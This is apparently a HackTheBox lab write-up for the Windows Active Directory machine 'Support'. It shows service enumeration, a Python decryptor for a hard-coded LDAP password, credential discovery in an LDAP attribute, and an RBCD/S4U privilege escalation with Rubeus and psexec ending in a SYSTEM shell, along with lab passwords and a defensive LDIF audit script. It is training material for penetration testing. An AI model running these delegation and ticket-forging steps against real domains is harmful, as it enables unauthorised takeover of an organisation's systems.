HackTheBox · Lab
Easy · Windows · Active Directory

Support.pdf

notes

NMAP

```shell
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-27 10:36:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-07-27T10:36:57
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```

SMB & LDAP reveng

Anonymous auth succeeds, but allows no enumeration


Guest auth succeeds and allows share enumeration


```shell
support-tools   READ            support staff tools
```


Spidering the share turns up an interesting file


```shell
//10.10.11.174/support-tools/UserInfo.exe.zip
```


Screenshot_2025-07-27_at_3.43.44_PM.png


Let’s examine this executable further


image.png


We can see functions like `FindUser`, `GetUser` & `LdapQuery`


image.png


```csharp
{
    // Decrypt the hard-coded LDAP bind password and bind as support\ldap
    string password = Protected.getPassword();
    entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
    entry.AuthenticationType = AuthenticationTypes.Secure;
    ds = new DirectorySearcher(entry);
}
```


This code indicates that the binary connects to a remote LDAP server with a hard-coded service account and fetches user information. We should add support.htb to our hosts file.


The password to auth with LDAP server is fetched from `Protected.getPassword()`


```csharp
{
    // Base64-encoded, XOR-obfuscated password and the hard-coded XOR key
    private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

    private static byte[] key = Encoding.ASCII.GetBytes("armando");

    public static string getPassword()
    {
        byte[] array = Convert.FromBase64String(enc_password);
        byte[] array2 = array; // same array, not a copy: the XOR happens in place
        for (int i = 0; i < array.Length; i++)
        {
            array2[i] = (byte)(array[i] ^ key[i % key.Length] ^ 0xDF);
        }
        return Encoding.Default.GetString(array2);
    }
}
```

- The `enc_password` string is Base64-decoded into a byte array.
- `array2` is assigned the same array (a reference, not a copy), so the XOR below modifies the decoded bytes in place.
- A loop walks each byte of `array` and XORs it with the corresponding byte of the repeating key, then with the constant byte `0xDF` (223).
- Finally the decrypted password is returned.

We can script the decryption in Python


```python
import base64

# Values taken from the decompiled Protected class
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

def get_password():
    encrypted_bytes = base64.b64decode(enc_password)
    decrypted_bytes = bytearray()

    # Mirror the C# loop: XOR each byte with the repeating key, then with 0xDF
    for i in range(len(encrypted_bytes)):
        decrypted_byte = encrypted_bytes[i] ^ key[i % len(key)] ^ 0xDF
        decrypted_bytes.append(decrypted_byte)

    # Encoding.Default is a single-byte codepage on the box; latin1 maps bytes 1:1
    return decrypted_bytes.decode('latin1')

print(get_password())
```


We can also use CyberChef for this

- From Base64
- XOR `armando` UTF8 / latin1
- XOR 223 Decimal

```shell
❯ py dec.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
```


Now we have the decrypted password and we can connect to LDAP


We can also run `UserInfo.exe` itself on Windows to enumerate users.


```powershell
PS C:\Users\Administrator\Desktop\UserInfo.exe> .\UserInfo.exe -v find -first "*"
[*] LDAP query to use: (givenName=*)
[+] Found 15 results:
       raven.clifton
       anderson.damian
       monroe.david
       cromwell.gerard
       west.laura
       levine.leopoldo
       langley.lucy
       daughtler.mabel
       bardot.mary
       stoll.rachelle
       thomas.raphael
       smith.rosario
       wilson.shelby
       hernandez.stanley
       ford.victoria
```


We can also use NXC with our new key


```shell
❯ nxc smb $IP -u 'ldap' -p $KEY --users | awk '{print $5}' | fgrep -v '[*]'
Administrator
Guest
krbtgt
ldap
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria
```

Let’s enumerate LDAP with ldapsearch

```shell
ldapsearch -x -H ldap://$IP -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" > ldap.out

❯ cat ldap.out|grep 'info:'
info: Ironside47pleasure40Watchful
```


Looks like we came across a password for the user `support`, stored in the `info` attribute of the account


```shell
❯ nxc winrm $IP -u $USER -p $PASS
[+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)
```
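As an added defender-side example (not part of the original notes), the same kind of finding can be audited from an ldapsearch dump: the script below parses LDIF and flags free-text attributes such as `info` and `description` whose values look like stored credentials. The LDIF sample and the detection heuristics are constructed for this example.

```python
import base64
import re

# Constructed LDIF in the shape of an `ldapsearch -x ... > ldap.out` dump (sample
# data only, not the real directory); jane.doe's description is base64 ('::').
SAMPLE_LDIF = """\
dn: CN=support,CN=Users,DC=example,DC=htb
description: Shared support account
info: Winter88breeze12Patient

dn: CN=jane.doe,CN=Users,DC=example,DC=htb
description:: UGFzc3dvcmQ6IFN1bW1lcjIwMjQh
info: Contractor, desk 4, ext
 12345
"""
FREE_TEXT_ATTRS = ("info", "description", "comment")  # where notes get stashed
# Heuristics assumed for this example: a credential keyword, or one token of 10+ chars mixing letters and digits.
KEYWORD = re.compile(r"(?i)\b(pass(word|wd)?|pwd|cred)")
SECRET_TOKEN = re.compile(r"^(?=.*[A-Za-z])(?=.*\d)\S{10,}$")

def parse_ldif(text):
    """Parse LDIF into [{attr: [values]}], unfolding continuation lines and decoding '::' base64."""
    lines = []
    for raw in text.splitlines():           # a leading space continues the previous line
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:               # a blank line closes the current entry
        if not line.strip():
            if current:
                entries.append(current)
            current = {}
            continue
        name, _, rest = line.partition(":")
        value = rest.strip()
        if rest.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(name.strip().lower(), []).append(value)
    return entries

def find_exposed_secrets(text):
    """Return (dn, attr, value) triples whose free-text values look like credentials."""
    return [(entry["dn"][0], attr, value)
            for entry in parse_ldif(text)
            for attr in FREE_TEXT_ATTRS
            for value in entry.get(attr, [])
            if KEYWORD.search(value) or SECRET_TOKEN.match(value)]
```

Run it over a real `ldap.out` by passing the file contents to `find_exposed_secrets` and review each hit by hand; the heuristic is deliberately noisy rather than silent.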

BloodHound

Screenshot_2025-07-28_at_7.32.00_AM.png


We have `GenericAll` on `DC.SUPPORT.HTB`

Let's do an RBCD/S4U attack

We add a fake computer account (this relies on ms-DS-MachineAccountQuota, which defaults to 10 and lets any authenticated user join machine accounts to the domain)


```powershell
New-MachineAccount -MachineAccount FAKE-COMP01 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
```


Configure RBCD: allow FAKE-COMP01$ to delegate to the DC


```powershell
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP01$
```


Compute the RC4 (NTLM) hash of the fake computer account's password for the S4U step


```powershell
.\Rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb
```


Execute the S4U (S4U2self/S4U2proxy) to get a Kerberos service ticket impersonating `Administrator`


```powershell
.\rubeus.exe s4u /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt
```


Convert and fix the ticket


Grab a shell


```shell
❯ KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass

C:\Windows\system32> whoami
nt authority\system
```


Scope

OS

Windows Server 2022 Build 20348 x64

FQDN / DOMAIN

DC.support.htb

Users

Administrator
Guest
krbtgt
ldap
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria

Credentials

support:Ironside47pleasure40Watchful

NMAP

```shell
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49674/tcp open  unknown
49686/tcp open  unknown
49691/tcp open  unknown
49713/tcp open  unknown
```

Logs

support_smb_spidering_2025-07-27_12-50-55.log